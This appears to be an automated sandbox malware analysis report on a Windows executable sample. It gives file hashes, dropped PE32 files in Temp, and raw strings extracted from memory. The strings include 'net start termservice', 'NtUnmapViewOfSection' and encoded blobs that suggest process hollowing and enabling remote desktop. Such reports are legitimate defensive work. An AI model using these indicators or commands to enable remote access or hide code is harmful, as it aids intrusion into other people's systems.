I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: cnfpnteryde.1.dr	String found in binary or memory: net start termservice
Source: cnfpnteryde.1.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: vkqcbyjdfiw.12.dr	String found in binary or memory: net start termservice
Source: vkqcbyjdfiw.12.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000

ID:	1542426
Product:	CloudBasic
Start time:	22:41:28
Start date:	25.10.2024
Sample:	5Z1WFRMTOXRH6X21Z8NU8.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ff827141856089465cec7afdc9e65f9d
SHA1:	e985a1d59d90a6522b4077b00bc68c86fc3d72d8
SHA256:	389d5818cb26a1cc113481b66332d164dc76d2c85d8735c074a9bc2409b8c9c0
Filetype:	Win32 Executable (generic) a (10002005/4) 99.53%

Windows Analysis Report
5Z1WFRMTOXRH6X21Z8NU8.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\9c813d63	PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced	9293AFEB225399232240F1E3F3255218	E7722613BA9E360D08D55161872908C797E52073	ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
C:\Users\user\AppData\Local\Temp\9d758fdb	data	73680C60EBB8AF0D53D554A508F347FE	6977123C1F1EC26864BED46988D7ECC1292F0E7E	749FBDD4C1633AB7BEA684BAE3356842B25ED8B233A7E8B25642058A8353DCF0
C:\Users\user\AppData\Local\Temp\bca94d0c	PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced	9293AFEB225399232240F1E3F3255218	E7722613BA9E360D08D55161872908C797E52073	ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
C:\Users\user\AppData\Local\Temp\be3cb5d2	PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced	9293AFEB225399232240F1E3F3255218	E7722613BA9E360D08D55161872908C797E52073	ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
C:\Users\user\AppData\Local\Temp\bf266e95	data	81B48765128043CAF286FDA096616A63	7A7D80908F6A17A8BFA2A08F372EDD83460D9F3D	C380E7BAA26116D71ACFF5FDF1EC6783AC8A8C93EB5179370EAB08000625621B
C:\Users\user\AppData\Local\Temp\cnfpnteryde	PE32 executable (GUI) Intel 80386, for MS Windows	A3EBAF3CD91B6B57CE7949FC51398080	2F149696DD3F00423062CDF28B6821052D5C1D38	759B9B860FAED4ECCD18EB34457584D0C799601C3613A8178C2404C5ADE18319
C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw	PE32 executable (GUI) Intel 80386, for MS Windows	A3EBAF3CD91B6B57CE7949FC51398080	2F149696DD3F00423062CDF28B6821052D5C1D38	759B9B860FAED4ECCD18EB34457584D0C799601C3613A8178C2404C5ADE18319

Windows Analysis Report 5Z1WFRMTOXRH6X21Z8NU8.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
5Z1WFRMTOXRH6X21Z8NU8.exe